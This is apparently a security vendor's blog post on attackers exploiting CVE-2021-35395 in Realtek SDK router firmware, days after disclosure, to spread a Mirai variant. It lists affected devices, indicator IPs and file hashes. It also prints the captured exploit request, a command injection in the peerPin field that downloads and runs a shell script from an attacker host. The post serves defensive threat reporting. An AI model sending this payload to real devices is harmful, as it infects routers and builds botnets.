Multiple attempts to exploit Realtek vulnerabilities discovered by our researchers

Nadav Liebermann|

Multiple attempts to exploit Realtek vulnerabilities discovered by our researchers

Nadav Liebermann|
Share on facebook
Share on twitter
Share on linkedin
Share on facebook
Share on twitter
Share on linkedin

On August 16th, three days ago, multiple vulnerabilities in a software SDK distributed as part of Realtek chipsets were disclosed by IoT Inspector Research Lab [1]. The vulnerabilities allow attackers to fully compromise and take control of affected devices. Just yesterday, only two days after the publication, our home security solution, Secure Home, detected attempts to exploit these vulnerabilities to spread a variant of a Mirai malware.

One of the vulnerabilities disclosed, CVE-2021-35395 [2], affects the web interface that is part of the SDK, and is a collection of 6 different vulnerabilities. As of August 18th, we have identified attempts to exploit CVE-2021-35395 in the wild.

Specifically, we noticed exploit attempts to “formWsc” and “formSysCmd” web pages. The exploit attempts to deploy a Mirai variant detected in March by Palo Alto Networks [3]. Mirai is a notorious IoT and router malware circulating in various forms for the last 5 years. It was originally used to shut down large swaths of the internet but has since evolved into many variants for different purposes [4].

Same attacker – different incidents

A similar incident was reported two weeks ago, on August 6th, by Juniper Networks [5]. A newly discovered vulnerability was then exploited in the wild only 2 days after publication to spread the same Mirai variant.

The webserver serving the Mirai botnet uses the same network subnet, indicating that the same attacker is involved in both incidents.

This chain of events shows that hackers are actively looking for command injection vulnerabilities and use them to propagate widely used malware quickly. These kinds of vulnerabilities are easy to exploit and can be integrated quickly into existing hacking frameworks that attackers employ, well before devices are patched and security vendors can react.

SAM’s security research group tracks published exploits and quickly blocks them using IoT virtual patching (read our recent article to learn more). The above vulnerabilities were blocked within a day of publication, protecting any potentially vulnerable device.

Affected devices

According to the original research, the vulnerable Realtek SDK is used by more than 65 vendors on more than 200 devices. According to SAM’s own research of connected devices, based on anonymously collected network data spanning more than 2M home and business networks, the following devices are the most common devices with the Realtek SDK:

  • Netis E1+ extender
  • Edimax N150 and N300 Wi-Fi router
  • Repotec RP-WR5444 router

These devices are used mainly to enhance Wi-Fi reception.

Full Attack Details

The attack originated from 31.210.20[.]100. However, we believe that attacker’s IP addresses will change over time.

The full attack payload:

POST /goform/formWsc HTTP/1.1

Connection: close

Content-Type: application/x-www-form-urlencoded

User-Agent: Dark

submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;cd /tmp; wget http://212.192.241.87/lolol.sh; curl -O http://212.192.241.87/lolol.sh; chmod 777 lolol.sh; sh lolol.sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=

 

IOCs

IP addresses – 31.210.20[.]100, 212.192.241[.]87

Files

Filename Hash (sha256)
dark.x86a3ee4bd2f330bf6939cb9121f36261e42f54ffc45676120216fd8da4cb52036a
dark.mips9dfaa2e60027427c9f1ff377ad3cd3bc800b914c4b9ea5e408442d25f475dab9
dark.mpsl24d6cd113c9ddf49cb6140d2cc185f2cc033170ac27e2c352d94848cc449c312
dark.arm4caa8b10057fb699d463f309913d0557462e8b37afdaf4d0c3cff63f9b9605f0d
dark.arm5fd7da924fe743d2e09b10f4e8a01230f7bc884ae14ef0e6133e553de118a457e
dark.arm60c734c8c0f8e575a08672d01fc5a729605b3e9dbb4d0c62bd94ad86d2c3d6aeb
dark.arm785b07054472bbaa06d0611dfb28632ffa351d3b13e37b447914f49a1dfe07dc4
dark.ppca5478d51a809aed51d633611371c105e3ec82490f9516d186e7013dabcf8c77f
dark.m68kbf9d92666d3b25cf6e49234472a2fa515107eb6df07f4aee6deb6a42eed4fa92
dark.sh416787be5e8d7de5816d590efb4916c7415f458bc7059d2d287715fb3ef8e0783
dark.86_6467a655d4360cfe0ca5db17c6486f3dfbca1c82c2af4bc1f2019cee68199108c7

———————————————————————————————————————————————-

Sources

[1] www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/

[2] nvd.nist.gov/vuln/detail/CVE-2021-35395

[3] unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/

[4] en.wikipedia.org/wiki/2016_Dyn_cyberattack

[5] blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild

Share on facebook
Share on twitter
Share on linkedin
Nadav Liebermann|
Subscribe
to our updates